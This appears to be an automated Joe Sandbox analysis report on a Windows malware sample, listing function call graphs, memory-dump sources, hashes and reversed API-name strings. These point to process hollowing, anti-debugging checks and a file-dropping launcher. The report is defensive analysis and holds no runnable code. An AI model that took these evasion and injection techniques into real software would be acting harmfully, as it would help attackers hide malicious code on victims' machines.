2cba1a6 29358->29359 29360 2cb89d0 4 API calls 29359->29360 29361 2cba217 29360->29361 29362 2cb89d0 4 API calls 29361->29362 29363 2cba288 29362->29363 29364 2cb89d0 4 API calls 29363->29364 29365 2cba2f9 29364->29365 29366 2cb89d0 4 API calls 29365->29366 29367 2cba39a 29366->29367 29368 2cb89d0 4 API calls 29367->29368 29369 2cba40b 29368->29369 29370 2cb89d0 4 API calls 29369->29370 29371 2cba47c 29370->29371 29372 2cb89d0 4 API calls 29371->29372 29373 2cba4ed 29372->29373 29374 2cb89d0 4 API calls 29373->29374 29375 2cba573 29374->29375 29376 2cb894c 3 API calls 29375->29376 29377 2cba587 29376->29377 29378 2cb894c 3 API calls 29377->29378 29379 2cba59b 29378->29379 29380 2cb894c 3 API calls 29379->29380 29381 2cba5af 29380->29381 29382 2cb89d0 4 API calls 29381->29382 29383 2cba620 29382->29383 29384 2cb894c 3 API calls 29383->29384 29385 2cba634 29384->29385 29386 2cb894c 3 API calls 29385->29386 29387 2cba648 29386->29387 29388 2cb894c 3 API calls 29387->29388 29389 2cba69a 29388->29389 29390 2cb894c 3 API calls 29389->29390 29391 2cba6ec 29390->29391 29392 2cb894c 3 API calls 29391->29392 29393 2cba700 29392->29393 29394 2cb894c 3 API calls 29393->29394 29395 2cba714 29394->29395 29396 2cb894c 3 API calls 29395->29396 29397 2cba728 29396->29397 29398 2cb894c 3 API calls 29397->29398 29399 2cba73c 29398->29399 29400 2cb894c 3 API calls 29399->29400 29401 2cba78e 29400->29401 29402 2cb894c 3 API calls 29401->29402 29403 2cba7e0 29402->29403 29404 2cb894c 3 API calls 29403->29404 29405 2cba832 29404->29405 29406 2cb894c 3 API calls 29405->29406 29407 2cba884 29406->29407 29408 2cb894c 3 API calls 29407->29408 29409 2cba8a3 29408->29409 29410 2cb894c 3 API calls 29409->29410 29410->29261 29411->28747 29412->28900 29413->28828 29414->28981 29415->29041 29416->28959 29417->29014 29419 2cb8965 29418->29419 29420 2cb89a5 29419->29420 29421 2cb7d78 3 API calls 29419->29421 29420->29115 29421->29420 29423 2cb835b 29422->29423 29424 2cb81cc 2 API calls 29423->29424 29425 2cb838d 29424->29425 29426 2cb8274 GetProcAddress 29425->29426 29427 2cb8393 FlushInstructionCache 29426->29427 29428 2cb83c1 29427->29428 29428->29229 29430 2cb8299 29429->29430 29431 2cb82cc GetProcAddress 29430->29431 29432 2cb82fb 29431->29432 29432->29238 29434 2cb7d9d 29433->29434 29440 2cb81cc 29434->29440 29436 2cb7dcd 29437 2cb8274 GetProcAddress 29436->29437 29438 2cb7dd3 NtWriteVirtualMemory 29437->29438 29439 2cb7e0c 29438->29439 29439->29240 29441 2cb81ef 29440->29441 29442 2cb8274 GetProcAddress 29441->29442 29443 2cb8215 GetModuleHandleA 29442->29443 29444 2cb823b 29443->29444 29444->29436 29446 2cb87ab 29445->29446 29447 2cb81cc 2 API calls 29446->29447 29448 2cb87dd 29447->29448 29449 2cb8274 GetProcAddress 29448->29449 29450 2cb87e3 CreateProcessAsUserW 29449->29450 29451 2cb882f 29450->29451 29451->29281 29453 2cb8425 29452->29453 29454 2cb81cc 2 API calls 29453->29454 29455 2cb8452 29454->29455 29456 2cb8274 GetProcAddress 29455->29456 29457 2cb8458 NtReadVirtualMemory 29456->29457 29458 2cb8493 29457->29458 29458->29309 29460 2cb8695 29459->29460 29461 2cb81cc 2 API calls 29460->29461 29462 2cb86c2 29461->29462 29463 2cb8274 GetProcAddress 29462->29463 29464 2cb86c8 NtUnmapViewOfSection 29463->29464 29465 2cb86f5 29464->29465 29465->29324 29467 2cb7a2a 29466->29467 29467->29466 29468 2cb81cc 2 API calls 29467->29468 29469 2cb7a7e 29468->29469 29470 2cb8274 GetProcAddress 29469->29470 29471 2cb7a84 NtAllocateVirtualMemory 29470->29471 29472 2cb7ac2 29471->29472 29472->29333

                                                                                                                Executed Functions

                                                                                                                Function 02CB7AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 12890 2cb7ac9 12891 2cb7a56 12890->12891 12892 2cb7a2a-2cb7a54 call 2ca4530 12891->12892 12893 2cb7a58-2cb7ac2 call 2cb798c call 2ca47ec call 2ca49a0 call 2cb81cc call 2cb8274 NtAllocateVirtualMemory call 2ca4500 12891->12893 12892->12891
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 2167126740-445027087
                                                                                                                • Opcode ID: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                • Instruction ID: 487dd44f69d4b8965a7ca238ba70fe97d7265f3d83f42a73ebaa1e1d63dce034
                                                                                                                • Opcode Fuzzy Hash: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                • Instruction Fuzzy Hash: BE117076680208BFEB25EFA4DC61EEAB7EDEF89700F415460BD01D7240D670AE08DB24
                                                                                                                Function 02CB7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 421316089-445027087
                                                                                                                • Opcode ID: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
                                                                                                                • Instruction ID: d35e43cdf6519915d983e7f9901a29b4ce7696426111a01c7dc7277a1d43c370
                                                                                                                • Opcode Fuzzy Hash: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
                                                                                                                • Instruction Fuzzy Hash: 27115B75680209BFEB25EFA4DD61EEEB7AEEF89700F414460B900D7240D670AE14DB20
                                                                                                                Function 02CB7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 12927 2cb7a2c-2cb7a47 12928 2cb7a4c-2cb7a56 call 2ca4530 12927->12928 12931 2cb7a2a 12928->12931 12932 2cb7a58-2cb7a7f call 2cb798c call 2ca47ec call 2ca49a0 call 2cb81cc call 2cb8274 12928->12932 12931->12927 12942 2cb7a84-2cb7ac2 NtAllocateVirtualMemory call 2ca4500 12932->12942
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 421316089-445027087
                                                                                                                • Opcode ID: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
                                                                                                                • Instruction ID: 84b77c6e4943d351f108c9773cee7175bc14f13f2108fb4c312efa49b46ba51b
                                                                                                                • Opcode Fuzzy Hash: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
                                                                                                                • Instruction Fuzzy Hash: A3116D75680209BFEB25EFA4DD61EDEB7AEEF89700F414460B900D7240D670AE14DB20
                                                                                                                Function 02CB8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB8471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                • API String ID: 2004920654-737317276
                                                                                                                • Opcode ID: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
                                                                                                                • Instruction ID: 9a8718512f8b517b0c54e90fba0b406d5f4d4b6984f2880420b82635de85b9a5
                                                                                                                • Opcode Fuzzy Hash: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
                                                                                                                • Instruction Fuzzy Hash: AE016579640208AFEB25EFA8DC61E9AB7EEFB48704F514420F904D7340D674AD10DF24
                                                                                                                Function 02CB7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                • API String ID: 4260932595-3542721025
                                                                                                                • Opcode ID: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
                                                                                                                • Instruction ID: 78d1a974077c55c2e075d1905afcd4a12206ab91b818e76c7dec468578bff531
                                                                                                                • Opcode Fuzzy Hash: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
                                                                                                                • Instruction Fuzzy Hash: 3C012D7A640289AFEB25EF98DC51E9EB7EDEF89700F514460B800D7640D670AD14DB64
                                                                                                                Function 02CB8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                • API String ID: 2801472262-2520021413
                                                                                                                • Opcode ID: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
                                                                                                                • Instruction ID: 739748ca6199268125a6eadeeb574ff6aabdb07454edfd07f0b6b4aa2a1ffccd
                                                                                                                • Opcode Fuzzy Hash: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
                                                                                                                • Instruction Fuzzy Hash: 69016D74A40208AFEB25EFB4DD61E9EB7EEEF89B14F514560B800E7640DA74AD04DA24
                                                                                                                Function 02CB86F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                • API String ID: 2801472262-2520021413
                                                                                                                • Opcode ID: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
                                                                                                                • Instruction ID: bb059f94d450ff01da575111411e77965e7c9cb6c01599880433dd25e394d74e
                                                                                                                • Opcode Fuzzy Hash: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
                                                                                                                • Instruction Fuzzy Hash: A7F04939A40209EFEB15FFB4E9509DDB7EEEF89314F5145A1A44497600DA30AE04DF10
                                                                                                                Function 02CB8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8814
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                • API String ID: 4105707577-2353454454
                                                                                                                • Opcode ID: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
                                                                                                                • Instruction ID: b184ac1baf577caab1b03594f22592a6b9b9590eab133f6cef23aa0fa1c8e71e
                                                                                                                • Opcode Fuzzy Hash: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
                                                                                                                • Instruction Fuzzy Hash: D711E2B2640248AFEB61EFA8DD91FDA77EDEF0C704F514520BA08E7200C674ED109B25
                                                                                                                Function 02CBF744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13006 2cbf744-2cbf75e call 2ca668c 13009 2cbf78a-2cbf792 13006->13009 13010 2cbf760-2cbf772 call 2ca6694 13006->13010 13010->13009 13013 2cbf774-2cbf784 CheckRemoteDebuggerPresent 13010->13013 13013->13009 13014 2cbf786 13013->13014 13014->13009
                                                                                                                APIs
                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBF77D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                • API String ID: 3662101638-539270669
                                                                                                                • Opcode ID: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
                                                                                                                • Instruction ID: 9068f52313cf04630e4c1d7f48903d5217e9df65c7e1d7e9715cc46603e5a760
                                                                                                                • Opcode Fuzzy Hash: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
                                                                                                                • Instruction Fuzzy Hash: 1CF0A77190424CBAEB11A6F98C887DCFBBD5F05329F2443D8B435B2AD1E7710740CA91

                                                                                                                Non-executed Functions

                                                                                                                Function 02CB8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB83C2), ref: 02CB83A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                • API String ID: 2392256011-184458249
                                                                                                                • Opcode ID: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
                                                                                                                • Instruction ID: 067961a0e7cce3a66ec7a916f8cf384186fc55d6909c03e76ea6128a29291d8f
                                                                                                                • Opcode Fuzzy Hash: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
                                                                                                                • Instruction Fuzzy Hash: 7D016975784348AFEB26EFA4DC62F9AB7EEEB08B00F514460B904D6740D6B0AD149F25
                                                                                                                Function 02CB8274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                • API String ID: 190572456-1372893251
                                                                                                                • Opcode ID: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
                                                                                                                • Instruction ID: b64e41fb3fd22123c87680a9d816b1db0dfcf516df3717620b9116deefb36234
                                                                                                                • Opcode Fuzzy Hash: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
                                                                                                                • Instruction Fuzzy Hash: 17016D75A40309AFEB25EFA4DC61E9EB7EEEB48B04F514460B805D7740DA70AD04DE68
                                                                                                                Function 02CB81CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                • API String ID: 1646373207-1952140341
                                                                                                                • Opcode ID: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
                                                                                                                • Instruction ID: 4d2158d97946b4596082ce787f036043b811fad725a13a3497fac4afa0c767b2
                                                                                                                • Opcode Fuzzy Hash: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
                                                                                                                • Instruction Fuzzy Hash: F7F09670E44704AFFB26EFB4DD1199AB7EDFB49700B514570B810C3750D670AE14D925

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:25%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:36
                                                                                                                Total number of Limit Nodes:2
                                                                                                                execution_graph 247 401000 malloc 248 401031 247->248 267 401453 _XcptFilter 249 401475 memset 250 58c000 249->250 251 4014a2 __set_app_type _controlfp __getmainargs 250->251 254 4013ff 251->254 253 401518 exit 255 40141a 254->255 258 40108c memset memset 255->258 257 401443 257->253 259 401141 258->259 260 40134e 259->260 261 401164 strcmp 259->261 260->257 262 401191 EntryPoint strcpy 261->262 263 4011db EntryPoint getenv EntryPoint sprintf 261->263 264 40126b fopen EntryPoint fwrite fclose 262->264 263->264 265 401310 EntryPoint ShellExecuteA 264->265 266 401349 264->266 265->266 266->257 268 401155 269 401141 268->269 270 401164 strcmp 268->270 269->270 271 40134e 269->271 272 401191 EntryPoint strcpy 270->272 273 4011db EntryPoint getenv EntryPoint sprintf 270->273 274 40126b fopen EntryPoint fwrite fclose 272->274 273->274 275 401310 EntryPoint ShellExecuteA 274->275 276 401349 274->276 275->276 282 401526 _controlfp 283 40108c 15 API calls 282->283 284 401580 283->284 277 4015d7 SetUnhandledExceptionFilter 278 4bf794 279 4bf7a0 278->279 279->278 280 4bf8b4 GetPEB 279->280 281 4bf7e1 279->281

                                                                                                                Callgraph

                                                                                                                Executed Functions

                                                                                                                Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID: %s\%s
                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59
                                                                                                                Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2992075992-0
                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59
                                                                                                                Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611591150-0
                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769
                                                                                                                Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                • API String ID: 2803490479-2443507578
